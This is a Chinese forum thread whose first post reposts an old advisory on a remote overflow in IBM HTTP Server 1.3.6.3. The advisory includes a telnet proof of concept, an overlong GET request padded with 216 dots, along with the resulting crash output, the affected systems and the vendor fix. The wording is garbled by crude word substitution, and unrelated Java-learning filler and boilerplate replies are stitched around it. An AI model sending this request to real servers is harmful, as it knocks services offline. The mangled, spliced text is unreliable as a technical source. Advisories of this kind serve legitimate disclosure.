仓酷云

标题: JAVA网页设计IBM HTTP Server 远程溢露马脚 [打印本页]

作者: 海妖 时间: 2015-1-18 11:19
标题: JAVA网页设计IBM HTTP Server 远程溢露马脚
有了这样一个呼声：让java代替C语言成为基本语言。这些足以说明java简单易学的这个优点。其次，java的功能强大，前面我也提到了，EJB3.0的推出使java成为了大型项目的首选。server

触及程序：
GET
形貌：
经由过程提交超长的GET哀求招致IBMHTTPServer远程溢出

具体：
IBM的HTTP服务器是一个web服务器。在WindowsNT利用的版本中存在回绝服务的毛病。
假如提交一个凌驾219个字符的GET哀求，将招致服务器中断呼应，并报错。要恢复服务一般事情必要从头启动使用程序。乐成的使用该毛病，打击者可在受益的主机上实行任何代码。（但这还未失掉完整证明。）

以下代码仅仅用来测试和研讨这个毛病，假如您将其用于不合法的路子请成果自信

$telnettarget80
GET/......(216个".")aaaHTTP/1.0
则体系会呈报以下毛病信息：
***STOP:0x0000001e(0X00000005,0X804B3A51,0X00000000,0X00000000)KMODE_EXCEPTI
ON_NOT_HANDLED.
***Address804B3A51baseat80400000,Datastamp384D9B17-ntoskrnl.exe
注重：方针主机运转在Windows2000下。
受影响的体系
IBMHTTPServer1.3.6.3
-TurboLinuxTurboLinux3.0.1
-SunSolaris2.6
-S.u.S.E.Linux6.1
-S.u.S.E.Linux6.0
-RedHatLinux6.0sparc
-RedHatLinux5.2sparc
-MicrosoftWindowsNT4.0
-IBMAIX4.2.1
-CalderaOpenLinux2.2
办理计划：
IBM已在1.3.12版本中办理了此成绩，下载地点：
http://www-4.ibm.com/software/webservers/httpservers/download.html

什么时候上述的三种开发工具能和三为一，什么时候java的竞争力才更强，才有机会拉拢更多的程序员投入到对java的开发上，因为到时的开发工具将会比.net的更简单。还有一点也很关键，什么时候java推出的jsf能成为真正意义上的标准。

作者: 蒙在股里 时间: 2015-1-20 20:23
科学超级计算机、移动电话和互联网，同时拥有全球最大的开发者专业社群。

作者: 深爱那片海 时间: 2015-1-29 20:48
当然你也可以参加一些开源项目，一方面可以提高自己，另一方面也是为中国软件事业做贡献嘛！开发者在互联网上用CVS合作开发，用QQ,MSN,E-mail讨论联系，天南海北的程序员分散在各地却同时开发同一个软件，是不是很有意思呢？

作者: 冷月葬花魂 时间: 2015-2-6 04:27
学Java必读的两个开源程序就是Jive和Pet Store.。 Jive是国外一个非常著名的BBS程序，完全开放源码。论坛的设计采用了很多先进的技术，如Cache、用户认证、Filter、XML等，而且论坛完全屏蔽了对数据库的访问，可以很轻易的在不同数据库中移植。论坛还有方便的安装和管理程序，这是我们平时编程时容易忽略的一部份（中国程序员一般只注重编程的技术含量，却完全不考虑用户的感受，这就是我们与国外软件的差距所在）。

作者: 金色的骷髅 时间: 2015-2-7 17:49
至于JDBC，就不用我多说了，你如果用java编过存取数据库的程序，就应该很熟悉。还有，如果你要用Java编发送电子邮件的程序，你就得看看Javamail 了。

作者: 小女巫 时间: 2015-2-17 03:32
我大二，Java也只学了一年，觉得还是看thinking in java好，有能力的话看英文原版(中文版翻的不怎么好)，还能提高英文文档阅读能力。

作者: 第二个灵魂 时间: 2015-3-5 14:49
你一定会高兴地说，哈哈，原来成为Java高手就这么简单啊!记得Tomjava也曾碰到过一个项目经理，号称Java很简单，只要三个月就可以学会。

作者: 不帅 时间: 2015-3-7 07:18
让你能够真正掌握接口或抽象类的应用，从而在原来的Java语言基础上跃进一步，更重要的是，设计模式反复向你强调一个宗旨：要让你的程序尽可能的可重用。

作者: 若天明 时间: 2015-3-7 18:39
不过，每次的执行编译后的字节码需要消耗一定的时间，这同时也在一定程度上降低了 Java 程序的运行效率。

作者: 兰色精灵 时间: 2015-3-15 11:21
是一种简化的C++语言是一种安全的语言，具有阻绝计算机病毒传输的功能

作者: admin 时间: 2015-3-22 00:10
Java 不同于一般的编译执行计算机语言和解释执行计算机语言。它首先将源代码编译成二进制字节码（bytecode），然后依赖各种不同平台上的虚拟机来解释执行字节码。从而实现了“一次编译、到处执行”的跨平台特性。

欢迎光临仓酷云 (http://ckuyun.com/)